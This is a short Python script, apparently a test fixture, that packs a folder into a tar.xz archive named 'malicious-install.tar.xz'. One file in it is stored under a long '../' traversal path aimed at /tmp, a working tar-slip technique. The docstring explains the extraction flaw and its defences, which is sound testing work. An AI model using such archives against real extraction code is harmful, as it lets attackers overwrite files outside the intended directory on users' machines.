README.md
import os
import tarfile
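def create_malicious_tar(folder_path, output_tar, malicious_file, traversal_path):
    """Pack ``folder_path`` into an xz-compressed tar with one traversal-named member.

    Every file under ``folder_path`` is stored under its path relative to that
    folder, except files whose basename equals ``malicious_file``: those are
    stored as ``traversal_path`` joined with ``malicious_file``. ``tarfile.add``
    keeps ``..`` segments in ``arcname`` as given, so the resulting member name
    points outside whatever directory the archive is later extracted into.

    The archive is a test fixture for extraction code. An extractor that joins
    member names onto its destination without checking the resolved path will
    write that member outside the destination. Extraction code should reject
    such members, for example ``TarFile.extractall(dest, filter="data")`` on
    Python versions that provide extraction filters, or an explicit check that
    each resolved member path stays under the destination.

    Args:
        folder_path: Directory whose files are packed.
        output_tar: Path of the ``.tar.xz`` archive to write.
        malicious_file: Basename of the file(s) to store under the traversal
            name. The match is on basename only, so a file with this name in
            any subdirectory is stored under the same member name.
        traversal_path: Relative prefix (containing ``..`` segments) prepended
            to ``malicious_file`` to form the member name.
    """
    with tarfile.open(output_tar, "w:xz") as tf:
        for root, _, files in os.walk(folder_path):
            for file in files:
                file_path = os.path.join(root, file)
                if file == malicious_file:
                    # Member name is taken from the traversal prefix, not
                    # from the file's real location on disk.
                    arcname = os.path.join(traversal_path, malicious_file)
                else:
                    # Ordinary member: path relative to the packed folder.
                    arcname = os.path.relpath(file_path, folder_path)
                tf.add(file_path, arcname=arcname)
    # Reported after the with-block so the archive is closed and flushed.
    print(f"Malicious tar.xz created: {output_tar}")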
# Fixture parameters for the archive built below.
# The prefix is a long run of parent-directory segments ending in tmp/;
# presumably long enough to reach the filesystem root from any realistic
# extraction directory (not verified here).
traversal_path = "../../../../../../../../../../../tmp/"
malicious_file = "hello.txt"
output_tar = "malicious-install.tar.xz"
folder_path = "tarcontent"

create_malicious_tar(
    folder_path=folder_path,
    output_tar=output_tar,
    malicious_file=malicious_file,
    traversal_path=traversal_path,
)